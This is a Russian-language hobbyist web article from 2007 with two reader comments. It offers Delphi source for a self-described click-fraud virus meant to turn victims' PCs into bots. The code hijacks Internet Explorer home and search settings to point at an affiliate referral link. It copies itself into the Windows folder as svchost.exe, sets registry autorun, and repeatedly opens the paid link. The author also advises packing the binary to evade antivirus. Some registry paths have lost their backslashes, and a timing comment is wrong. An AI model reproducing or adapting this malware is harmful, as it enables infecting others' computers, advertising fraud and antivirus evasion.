Вирус кликер на Delphi
Написал admin   
16.11.2007
Итак, от нечего делать  когда упали мои продажи по кликам пришлось
стать хамом ;)
И написать вирус, чтоб не палися антивирем и приносил прибыль делая 
из компов ботов!
Вирус написан на Дельфи! Поймёт тот  кто шарит хоть немного!

Создаём проект!
Удаляем главную форму!
===
После компиляции важно поменять имя в base.exe! Также не мешает криптануть файлег чтоб не палилсо антивирями

 

program Project2;

uses
Windows,
registry,
ShellAPI,
Forms;

//{$R *.res}
Var Reg:TRegistry; I:integer; disk: PChar;

procedure SetAutorun(aProgTitle,aCmdLine: string; aRunOnce: boolean ); 
var
hKey: string;
hReg: TRegIniFile;
begin
if aRunOnce then hKey := 'Once'
else
hKey := '';

hReg := TRegIniFile.Create( '' );
hReg.RootKey := HKEY_LOCAL_MACHINE;
hReg.WriteString('Software\Microsoft\Windows\CurrentVersion\Run'
+ hKey + #0,
aProgTitle,
aCmdLine );
hReg.destroy;
end;
begin
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_Current_User; 

Reg.OpenKey('SoftwareMicrosoftInternet ExplorerMain',true);
//Платные ссылки для кликов
Reg.WriteString('Start Page','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.WriteString('Use Search Asst','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.WriteString('Search Page','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.WriteString('Search Bar','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.CloseKey; 

Reg.OpenKey('SoftwareMicrosoftInternet Explorer',true); 
Reg.WriteString('SearchURL','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.CloseKey; 

Reg.OpenKey('SoftwareMicrosoftInternet ExplorerSearchURL',true); 
Reg.WriteString('provide','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.CloseKey; 

Reg.OpenKey('SoftwareMicrosoftInternet ExplorerSearch',true); 
Reg.WriteString('SearchAssistant','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.CloseKey;
Reg.OpenKey('SoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders',true);

//base.exe так должена называтся прга для удачного заражения!
CopyFile('base.exe','C:\WINDOWS\svchost.exe',true);
if CopyFile('base.exe','D:\WINDOWS\svchost.exe',true) then begin SetAutorun('lol', 'D:\WINDOWS\svchost.exe', true) end;
SetAutorun('lol', 'C:\WINDOWS\svchost.exe', true);

for i:=0 to 10 do
begin 
sleep(15000); // Это где-то 1.5 часа (в миллисекундах)
shellexecute(application.Handle,nil,pchar('http://www.russianfeme.com/index.html?l=r&ref=10585'),nil,nil,sw_normal);

end;




end.

Автор: © П.Cергей(Актобе)


Просмотров: 2199

Коментарии (2)
 
норм статья :)  
 
вот только размер этого "виря"? с учётом модуля "Forms"? 300-400 кб? упаковать - 150 кб)) тоже не очень.. а так зачотная статья :)
 
ceeqwer, 03:57 16 ноября 2007 г.
 
Ты нуб? :( читать умееш? 
 
>>>Создаём проект! 
>>>Удаляем главную форму! 
 
Размер его 14 кб :grin
 
Серега, 20:52 06 декабря 2007 г.

Только зарегистрированные пользователи могут оставлять коментарии.
Пожалуйста зарегистрируйтесь или войдите в ваш аккаунт.

 
< Пред.   След. >
Журнал о компьютерах, новости интернета © 2008